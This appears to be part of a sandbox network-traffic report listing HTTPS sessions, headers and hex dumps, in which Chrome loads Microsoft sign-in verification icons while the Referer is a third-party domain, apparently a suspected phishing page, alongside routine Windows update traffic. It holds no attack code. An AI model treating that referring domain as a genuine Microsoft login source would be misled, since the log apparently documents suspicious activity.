                                                      2024-10-23 21:29:39 UTC1369INData Raw: 92 fe 60 54 f4 07 49 8f 44 00 14 6e 44 e3 31 8d a2 ac f5 87 86 6e cc a7 00 af 4a ce 9e b8 f6 da 33 67 56 ca 06 6d 1d 10 9f dd 40 60 c8 39 dd a6 74 9b 72 8e 0c b0 71 27 df 3f 79 c7 9d 17 ce c7 dd 21 0f 72 50 ff 3d c9 11 e8 39 c6 38 65 ec 64 a3 3f 6a 51 c6 19 05 a0 f9 f8 0e cc 27 e3 9c 02 3d 4f 39 a3 40 e9 61 a3 3f 6c 53 ce 18 8b 39 ea 3d bc fa 0c f6 e0 69 32 22 d7 13 12 90 c8 50 16 4c 2e aa 04 c3 5d 80 9e 61 ac 67 67 d2 70 96 0e ea b1 6d 10 d2 d4 57 5e 0a 39 81 77 d8 fa 70 d0 ef 0f 0e 95 65 d4 8f 6a 00 ad 1c 5b 7d e7 ad d0 6c 4e 83 4a f3 ec 5f b3 ad c3 7e bf df 3f d4 7b e5 6a e5 d8 fa 3b 6e 85 66 63 6a be 54 04 4f 83 d8 dc d9 39 38 dc d9 d9 14 00 ea 47 b4 6d 6b ad 3f 79 ee ce ad 8d f5 a1 b4 6d cb a2 c7 47 bf 3f cf c3 83 42 b7 8f 37 36 72 69 db 46 53 42 14
                                                      Data Ascii: `TIDnD1nJ3gVm@`9trq'?y!rP=98ed?jQ'=O9@a?lS9=i2"PL.]aggpmW^9wpej[}lNJ_~?{j;nfcjTO98Gmk?ymG?B76riFSB


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      17192.168.2.164965213.107.246.454436768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-23 21:29:39 UTC657OUTGET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1
                                                      Host: aadcdn.msauth.net
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://new.alex-gps.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-10-23 21:29:39 UTC805INHTTP/1.1 200 OK
                                                      Date: Wed, 23 Oct 2024 21:29:39 GMT
                                                      Content-Type: image/svg+xml
                                                      Content-Length: 199
                                                      Connection: close
                                                      Cache-Control: public, max-age=31536000
                                                      Content-Encoding: gzip
                                                      Last-Modified: Wed, 24 May 2023 10:11:49 GMT
                                                      ETag: 0x8DB5C3F49C21D98
                                                      x-ms-request-id: 869b4d88-e01e-0026-6ba5-23fcf1000000
                                                      x-ms-version: 2009-09-19
                                                      x-ms-lease-status: unlocked
                                                      x-ms-blob-type: BlockBlob
                                                      Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                      Access-Control-Allow-Origin: *
                                                      x-azure-ref: 20241023T212939Z-r197bdfb6b4gdlhqw6kbe0ekvs00000009t000000000f1e5
                                                      x-fd-int-roxy-purgeid: 4554691
                                                      X-Cache: TCP_HIT
                                                      X-Cache-Info: L1_T2
                                                      Accept-Ranges: bytes
                                                      2024-10-23 21:29:39 UTC199INData Raw: 1f 8b 08 00 00 00 00 00 04 00 75 8f bd ae c2 30 0c 85 5f 25 32 6b d5 38 3f 88 80 92 0e 77 ea 00 6b 87 bb 21 08 4d a4 d2 22 62 35 3c fe 4d 2e 62 44 b6 e4 63 fb d3 b1 6c d3 3a b2 d7 7d 9a 93 83 40 f4 38 70 9e 73 6e b3 6a 97 e7 c8 25 22 f2 42 00 cb f1 4a c1 81 36 c0 82 8f 63 a0 b7 5e a3 cf 3f cb cb 01 32 64 da 94 84 ce 52 a4 c9 77 e7 94 3c 25 cb df 9d 7d fa 0b 7d 73 b9 c5 69 72 30 2f b3 07 de d9 c7 99 02 bb 3a 38 29 d3 28 1c 84 ec 05 0e 0a 83 5e 75 bb dd 99 a3 30 b5 94 55 af cc 49 c8 46 c9 de 0c 02 7b 5d a8 c2 ee 5b 2d e5 b1 ce ff d5 ef c7 7e a3 b1 46 bd 50 5f ea fe 00 a3 0d 47 ef fa 00 00 00
                                                      Data Ascii: u0_%2k8?wk!M"b5<M.bDcl:}@8psnj%"BJ6c^?2dRw<%}}sir0/:8)(^u0UIF{][-~FP_G


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      18192.168.2.1649650152.199.21.1754436768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-23 21:29:39 UTC660OUTGET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1
                                                      Host: aadcdn.msftauth.net
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://new.alex-gps.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-10-23 21:29:39 UTC738INHTTP/1.1 200 OK
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                      Age: 18374151
                                                      Cache-Control: public, max-age=31536000
                                                      Content-MD5: 1jQlecEJaGhFO2st5KXLhg==
                                                      Content-Type: image/svg+xml
                                                      Date: Wed, 23 Oct 2024 21:29:39 GMT
                                                      Etag: 0x8DB5C3F4AC59B47
                                                      Last-Modified: Wed, 24 May 2023 10:11:51 GMT
                                                      Server: ECAcc (lhc/78BB)
                                                      Vary: Accept-Encoding
                                                      X-Cache: HIT
                                                      x-ms-blob-type: BlockBlob
                                                      x-ms-lease-status: unlocked
                                                      x-ms-request-id: 2ee1dbb1-b01e-00dc-3276-7e9a59000000
                                                      x-ms-version: 2009-09-19
                                                      Content-Length: 1636
                                                      Connection: close
                                                      2024-10-23 21:29:39 UTC1636INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 38 2c 31 34 48 31 30 56 33 34 48 33 38 56 31 34 6d 32 2c 32 32 48 38 56 31 32 48 34 30 56 33 36 4d 31 37 2e 36 38 38 2c 31 38 2e 38 56 32 38 2e 38 32 38 48 31 35 2e 35 33 31 56 32 31 2e 32 33 34 61 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 2e 36 37 32 2e 34 33 6c 2d 2e 32 36 36 2e 31 31 37 61
                                                      Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      19192.168.2.164966013.107.246.674436768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-23 21:29:39 UTC438OUTGET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1
                                                      Host: aadcdn.msauth.net
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-10-23 21:29:39 UTC785INHTTP/1.1 200 OK
                                                      Date: Wed, 23 Oct 2024 21:29:39 GMT
                                                      Content-Type: image/svg+xml
                                                      Content-Length: 2407
                                                      Connection: close
                                                      Cache-Control: public, max-age=31536000
                                                      Content-Encoding: gzip
                                                      Last-Modified: Wed, 24 May 2023 10:11:49 GMT
                                                      ETag: 0x8DB5C3F499A9B99
                                                      x-ms-request-id: 2b9df6af-201e-0053-5a47-25e062000000
                                                      x-ms-version: 2009-09-19
                                                      x-ms-lease-status: unlocked
                                                      x-ms-blob-type: BlockBlob
                                                      Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                      Access-Control-Allow-Origin: *
                                                      x-azure-ref: 20241023T212939Z-r197bdfb6b42sc4ddemybqpm140000000ncg000000008waf
                                                      x-fd-int-roxy-purgeid: 4554691
                                                      X-Cache: TCP_HIT
                                                      Accept-Ranges: bytes
                                                      2024-10-23 21:29:39 UTC2407INData Raw: 1f 8b 08 00 00 00 00 00 04 00 ed 59 3d 73 dd 38 12 cc af ea fe 03 eb 6d 72 17 88 02 66 f0 79 b5 ba e0 98 38 a0 52 05 ca ec 95 6c ab 4e 6b bb 6c af b5 3f ff ba 07 e0 7b 24 94 6c 7c 65 27 7a 4d 02 33 c3 c1 a0 a7 01 ff fa ed c7 87 e9 e5 e9 e1 fb c7 9b 53 28 a7 e9 e3 e3 d3 87 8f df db ef 1f 4f 8f 2f ff f9 fc e7 cd c9 4d 6e 0a 65 e2 b3 f7 4f cf cf 37 a7 4f 9f 3f 3d 9e a6 3f 7f 7f fe f4 ed e6 f4 f1 fb f7 2f ff ba be 7e 79 79 99 5f 74 fe fc f5 c3 b5 38 e7 ae 61 f8 f4 ef bf ff ed d7 df df 7e fb ef f4 f4 00 2b f9 9d 24 a7 e1 2a a6 b7 7a 15 ea 83 5c 95 f7 92 ae 7e cb ef 4a 78 7c 17 1e 1f 1f c2 e6 e0 97 f7 f6 cf 0c 7c 79 fb fd a3 3d be fa fa c7 f3 e3 cd e9 f1 c7 e3 a7 cf 0f 0f a7 e9 b7 e7 a7 2f e3 33 f8 b9 15 9d 6b 4e 32 b9 c5 a7 b9 48 08 08 df 3b 3c 73 79 8a b3 04
                                                      Data Ascii: Y=s8mrfy8RlNkl?{$l|e'zM3S(O/MneO7O?=?/~yy_t8a~+$*z\~Jx||y=/3kN2H;<sy


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      20192.168.2.164966313.107.246.674436768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-23 21:29:39 UTC421OUTGET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1
                                                      Host: aadcdn.msauth.net
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-10-23 21:29:40 UTC805INHTTP/1.1 200 OK
                                                      Date: Wed, 23 Oct 2024 21:29:40 GMT
                                                      Content-Type: image/svg+xml
                                                      Content-Length: 199
                                                      Connection: close
                                                      Cache-Control: public, max-age=31536000
                                                      Content-Encoding: gzip
                                                      Last-Modified: Wed, 24 May 2023 10:11:49 GMT
                                                      ETag: 0x8DB5C3F49C21D98
                                                      x-ms-request-id: 869b4d88-e01e-0026-6ba5-23fcf1000000
                                                      x-ms-version: 2009-09-19
                                                      x-ms-lease-status: unlocked
                                                      x-ms-blob-type: BlockBlob
                                                      Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                      Access-Control-Allow-Origin: *
                                                      x-azure-ref: 20241023T212940Z-r197bdfb6b4lkrtc7na2dkay28000000027g000000001z59
                                                      x-fd-int-roxy-purgeid: 4554691
                                                      X-Cache: TCP_HIT
                                                      X-Cache-Info: L1_T2
                                                      Accept-Ranges: bytes
                                                      2024-10-23 21:29:40 UTC199INData Raw: 1f 8b 08 00 00 00 00 00 04 00 75 8f bd ae c2 30 0c 85 5f 25 32 6b d5 38 3f 88 80 92 0e 77 ea 00 6b 87 bb 21 08 4d a4 d2 22 62 35 3c fe 4d 2e 62 44 b6 e4 63 fb d3 b1 6c d3 3a b2 d7 7d 9a 93 83 40 f4 38 70 9e 73 6e b3 6a 97 e7 c8 25 22 f2 42 00 cb f1 4a c1 81 36 c0 82 8f 63 a0 b7 5e a3 cf 3f cb cb 01 32 64 da 94 84 ce 52 a4 c9 77 e7 94 3c 25 cb df 9d 7d fa 0b 7d 73 b9 c5 69 72 30 2f b3 07 de d9 c7 99 02 bb 3a 38 29 d3 28 1c 84 ec 05 0e 0a 83 5e 75 bb dd 99 a3 30 b5 94 55 af cc 49 c8 46 c9 de 0c 02 7b 5d a8 c2 ee 5b 2d e5 b1 ce ff d5 ef c7 7e a3 b1 46 bd 50 5f ea fe 00 a3 0d 47 ef fa 00 00 00
                                                      Data Ascii: u0_%2k8?wk!M"b5<M.bDcl:}@8psnj%"BJ6c^?2dRw<%}}sir0/:8)(^u0UIF{][-~FP_G


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      21192.168.2.1649662184.28.90.27443
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-23 21:29:40 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Accept: */*
                                                      Accept-Encoding: identity
                                                      User-Agent: Microsoft BITS/7.8
                                                      Host: fs.microsoft.com
                                                      2024-10-23 21:29:40 UTC466INHTTP/1.1 200 OK
                                                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                      Content-Type: application/octet-stream
                                                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                      Server: ECAcc (lpl/EF06)
                                                      X-CID: 11
                                                      X-Ms-ApiVersion: Distribute 1.2
                                                      X-Ms-Region: prod-neu-z1
                                                      Cache-Control: public, max-age=69392
                                                      Date: Wed, 23 Oct 2024 21:29:40 GMT
                                                      Connection: close
                                                      X-CID: 2


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      22192.168.2.1649672152.199.21.1754436768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-23 21:29:40 UTC424OUTGET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1
                                                      Host: aadcdn.msftauth.net
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-10-23 21:29:40 UTC738INHTTP/1.1 200 OK
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                      Age: 18374152
                                                      Cache-Control: public, max-age=31536000
                                                      Content-MD5: 1jQlecEJaGhFO2st5KXLhg==
                                                      Content-Type: image/svg+xml
                                                      Date: Wed, 23 Oct 2024 21:29:40 GMT
                                                      Etag: 0x8DB5C3F4AC59B47
                                                      Last-Modified: Wed, 24 May 2023 10:11:51 GMT
                                                      Server: ECAcc (lhc/78BB)
                                                      Vary: Accept-Encoding
                                                      X-Cache: HIT
                                                      x-ms-blob-type: BlockBlob
                                                      x-ms-lease-status: unlocked
                                                      x-ms-request-id: 2ee1dbb1-b01e-00dc-3276-7e9a59000000
                                                      x-ms-version: 2009-09-19
                                                      Content-Length: 1636
                                                      Connection: close
                                                      2024-10-23 21:29:40 UTC1636INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 38 2c 31 34 48 31 30 56 33 34 48 33 38 56 31 34 6d 32 2c 32 32 48 38 56 31 32 48 34 30 56 33 36 4d 31 37 2e 36 38 38 2c 31 38 2e 38 56 32 38 2e 38 32 38 48 31 35 2e 35 33 31 56 32 31 2e 32 33 34 61 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 2e 36 37 32 2e 34 33 6c 2d 2e 32 36 36 2e 31 31 37 61
                                                      Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      23192.168.2.1649676184.28.90.27443
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-23 21:29:41 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Accept: */*
                                                      Accept-Encoding: identity
                                                      If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                      Range: bytes=0-2147483646
                                                      User-Agent: Microsoft BITS/7.8
                                                      Host: fs.microsoft.com
                                                      2024-10-23 21:29:41 UTC514INHTTP/1.1 200 OK
                                                      ApiVersion: Distribute 1.1
                                                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                      Content-Type: application/octet-stream
                                                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                      Server: ECAcc (lpl/EF06)
                                                      X-CID: 11
                                                      X-Ms-ApiVersion: Distribute 1.2
                                                      X-Ms-Region: prod-weu-z1
                                                      Cache-Control: public, max-age=69360
                                                      Date: Wed, 23 Oct 2024 21:29:41 GMT
                                                      Content-Length: 55
                                                      Connection: close
                                                      X-CID: 2
                                                      2024-10-23 21:29:41 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                      Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      24192.168.2.164967920.12.23.50443
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-23 21:29:43 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=UpOpLcHcw3dMKAK&MD=2vTvUBNv HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Accept: */*
                                                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                      Host: slscr.update.microsoft.com
                                                      2024-10-23 21:29:44 UTC560INHTTP/1.1 200 OK
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      Content-Type: application/octet-stream
                                                      Expires: -1
                                                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                      ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                      MS-CorrelationId: 3686f1a2-a566-4760-97fa-1ac10304bef7
                                                      MS-RequestId: 2085f64c-c81f-4fa6-96a9-a554de92d72d
                                                      MS-CV: 3+/r6cCgs0WfSzI2.0
                                                      X-Microsoft-SLSClientCache: 2880
                                                      Content-Disposition: attachment; filename=environment.cab
                                                      X-Content-Type-Options: nosniff
                                                      Date: Wed, 23 Oct 2024 21:29:43 GMT
                                                      Connection: close
                                                      Content-Length: 24490
                                                      2024-10-23 21:29:44 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                      Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                      2024-10-23 21:29:44 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                      Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      25192.168.2.164922752.165.164.15443
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-23 21:29:59 UTC142OUTGET /clientwebservice/ping HTTP/1.1
                                                      Connection: Keep-Alive
                                                      User-Agent: DNS resiliency checker/1.0
                                                      Host: fe3cr.delivery.mp.microsoft.com
                                                      2024-10-23 21:29:59 UTC234INHTTP/1.1 200 OK
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      Expires: -1
                                                      Server: Microsoft-IIS/10.0
                                                      X-Powered-By: ASP.NET
                                                      X-Content-Type-Options: nosniff
                                                      Date: Wed, 23 Oct 2024 21:29:59 GMT
                                                      Connection: close
                                                      Content-Length: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      26192.168.2.164922820.12.23.50443
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-23 21:30:00 UTC124OUTGET /sls/ping HTTP/1.1
                                                      Connection: Keep-Alive
                                                      User-Agent: DNS resiliency checker/1.0
                                                      Host: slscr.update.microsoft.com
                                                      2024-10-23 21:30:00 UTC318INHTTP/1.1 200 OK
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      Expires: -1
                                                      MS-CV: qXqNqY1ABkqpm5LK.0
                                                      MS-RequestId: 2393ced4-835f-4251-b796-06f98ab1ea03
                                                      MS-CorrelationId: c9d7dfe1-f5a3-443b-875b-8d4388aeaa1a
                                                      X-Content-Type-Options: nosniff
                                                      Date: Wed, 23 Oct 2024 21:30:00 GMT
                                                      Connection: close
                                                      Content-Length: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      27192.168.2.164922952.149.20.212443
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-23 21:30:02 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=UpOpLcHcw3dMKAK&MD=2vTvUBNv HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Accept: */*
                                                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                      Host: slscr.update.microsoft.com
                                                      2024-10-23 21:30:03 UTC560INHTTP/1.1 200 OK
                                                      Cache-Control: no-cache
                                                      Pragma: no-cache
                                                      Content-Type: application/octet-stream
                                                      Expires: -1
                                                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                      ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                      MS-CorrelationId: cf74dec9-a4d8-4ab8-9751-0dd04ab3d40b
                                                      MS-RequestId: 89874ece-9708-4d0d-b4a5-abb2fc139842
                                                      MS-CV: YmSYSd1h2UOuLDd2.0
                                                      X-Microsoft-SLSClientCache: 2880
                                                      Content-Disposition: attachment; filename=environment.cab
                                                      X-Content-Type-Options: nosniff
                                                      Date: Wed, 23 Oct 2024 21:30:02 GMT
                                                      Connection: close
                                                      Content-Length: 24490
                                                      2024-10-23 21:30:03 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
